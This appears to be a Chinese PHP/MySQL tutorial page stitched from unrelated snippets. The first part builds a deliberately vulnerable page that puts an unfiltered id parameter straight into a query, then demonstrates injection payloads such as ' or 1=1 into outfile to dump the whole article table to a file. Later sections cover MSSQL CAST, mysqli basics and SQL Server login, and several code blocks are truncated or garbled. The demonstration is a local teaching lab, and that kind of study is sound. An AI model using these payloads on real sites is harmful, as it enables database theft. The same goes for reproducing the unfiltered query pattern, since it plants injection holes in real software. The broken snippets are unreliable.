在数据库中建立一张表:
| 代码如下 | 复制代码 |
|
CREATE TABLE `article` ( `articleid` int(11) NOT NULL AUTO_INCREMENT, `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '', `content` text CHARACTER SET utf8 NOT NULL, PRIMARY KEY (`articleid`) ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1; |
|
在表中插入数据的操作我就不贴代码了,可以去下载下来直接导入到数据库。
接下来,写一个处理用户请求的页面,这里,我们故意不过滤用户提交过来的数据,留下个SQL注入漏洞用来测试。
代码如下:
| 代码如下 | 复制代码 |
|
<?php $servername = "localhost"; $dbusername = "root"; $dbpassword = ""; $dbname = "test"; $id=$_GET['id'];//id未经过滤 $conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); mysql_select_db($dbname,$conn); mysql_query('set names utf8'); $sql = "SELECT * FROM article WHERE articleid='$id'"; $result = mysql_query($sql,$conn); $row = mysql_fetch_array($result); echo "<p>利用SQL注入漏洞拖库<p>"; if (!$row){ echo "该记录不存在"; exit; } echo "标题<br>".$row['title']."<p>"; echo "内容<br>".$row['content']."<p>"; ?> |
|
我们直接在浏览器中输入:
| 代码如下 | 复制代码 |
|
http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1 |
|
即可访问article表中id为1的一条记录
访问结果如下:
接下来,我们就利用这个漏洞(不知道该漏洞的情况下,只能通过工具+手工检测),演示一下如何将article表下载下来。
在地址栏中输入:
| 代码如下 | 复制代码 |
| ’ into outfile 'e:/sql.txt'%23 | |
分析:%23是#的ASCII码,由于在地址栏中直接输入#后到数据库系统中会变成空,需要在地址栏中输入%23,那么才会变成#,进而注释掉后面的sql语句。
运行之后,打开E盘,发现多了一个sql.txt文件,打开之后,里面就是表article中的一条记录。
为什么只有一条记录呢?难道该数据表就只有一条记录?不是这样的,因为我们只检索id为1的一条记录而已,那么能否将article表中的所有记录一次性全部下载下来呢?
答案是可以的,只要你的构造的SQL语句足够灵活(再次提出了构造SQL语句的灵活性)。
分析一下,当在URL地址栏中输入’into outfile 'e:/sql.txt'%23的时候,合并到sql查询语句中变为:
| 代码如下 | 复制代码 |
|
|
|
仔细分析下之后,我们可以这样子构造SQL语句:
| 代码如下 | 复制代码 |
| SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#' | |
这样的话,无论如何WHERE子句总是为真,换句话说,该sql语句等价于如下:
| 代码如下 | 复制代码 |
| SELECT * FROM article into outfile 'e:/whf.txt'#' | |
懂了吧,该sql语句在先执行select语句,将表article中的所以内容全部检索出来,然后再执行into outfile 'e:/whf.txt'#'将内容导出来。
不信的话,你执行下……
利用SQL注入漏洞,我们可以猜测表名,列名,用户的密码长度(LEFT函数)等等,当然了,如果能直接向以上的演示那样将表中的数据全部导出的话就没必要去猜表名列名等等
PHP 连接 MSSQL 的新手经常遇到这个问题:数据库里面的 nvarchar 字段中数据一切正常,但是用 PHP 查询出来却发现长度只有 255,我们都知道,在 MySQL 里面 varchar 的长度只有 255,但是 MSSQL 却不是,不会是 PHP 将 nvarchar 按照 MySQL 的 varchar 处理了吧!本文给出了解决方法:
select cast(目标字段 as text) from 表名
假如你的 article 表中有个字段 summary 为 nvarchar,那么命令为:
| 代码如下 | 复制代码 |
| select cast(summary as text) from article |
|
关于 cast :
| 代码如下 | 复制代码 |
|
CAST ( expression AS data_type ) |
|
expression 为目标字段
data_type 为要转换成的数据类型
本文章分享一篇关于php mysql替换字符串方法,有需要的同学可以参考一下。
| 代码如下 | 复制代码 |
|
field_languages_value like '%Mandarin Chinese%'"); d",$b,$result->nid); |
|
一、连接数据库
数据库变量文件:connectvars.php
| 代码如下 | 复制代码 |
| <?php //服务器 define('DB_HOST', '127.0.0.1'); //用户名 define('DB_USER', 'root'); //密码 define('DB_PASSWORD', 'root'); //数据库 define('DB_NAME','test') ; ?> |
|
在使用处连接数据库
| 代码如下 | 复制代码 |
|
require_once 'connectvars.php'; |
|
二、对数据库进行增、删、改、查
//查询、修改、删除操作都写成SQL语句
| 代码如下 | 复制代码 |
| $query = "SELECT * FROM toyota ORDER BY ID DESC"; //$data保存信息较为丰富,可用其判断是否操作成功,或利用其取数据,查询记录条数 $data = mysqli_query($dbc,$query); |
|
三、判断操作是否成功
| 代码如下 | 复制代码 |
|
if($data){ |
|
四、获得查询记录数目
| 代码如下 | 复制代码 |
|
$count = mysqli_num_rows($data); |
|
五、对记录进行循环操作
假设记录中有个字段为'url'
| 代码如下 | 复制代码 |
|
while($row = mysqli_fetch_array($data)){ |
|
必须对服务器启用 SQL Server 混合模式身份验证。
在尝试建立连接时必须设置 UID 和 PWD 连接属性。UID 和 PWD 必须映射到有效的 SQL Server 用户和密码。
注意:
包含右大括号 (}) 的密码必须使用另一个右大括号进行转义。例如,如果 SQL Server 密码为“pass}word”,则 PWD 连接属性的值必须设置为“pass}}word”。
在使用 SQL Server 身份验证连接到 SQL Server 时应采取以下预防措施:
下面看一个简单的实例:
| 代码如下 | 复制代码 |
|
<?php $conn = sqlsrv_connect( $serverName, $connectionInfo); $tsql = "SELECT CONVERT(varchar(32), SUSER_SNAME())"; $row = sqlsrv_fetch_array($stmt); sqlsrv_free_stmt( $stmt); |
|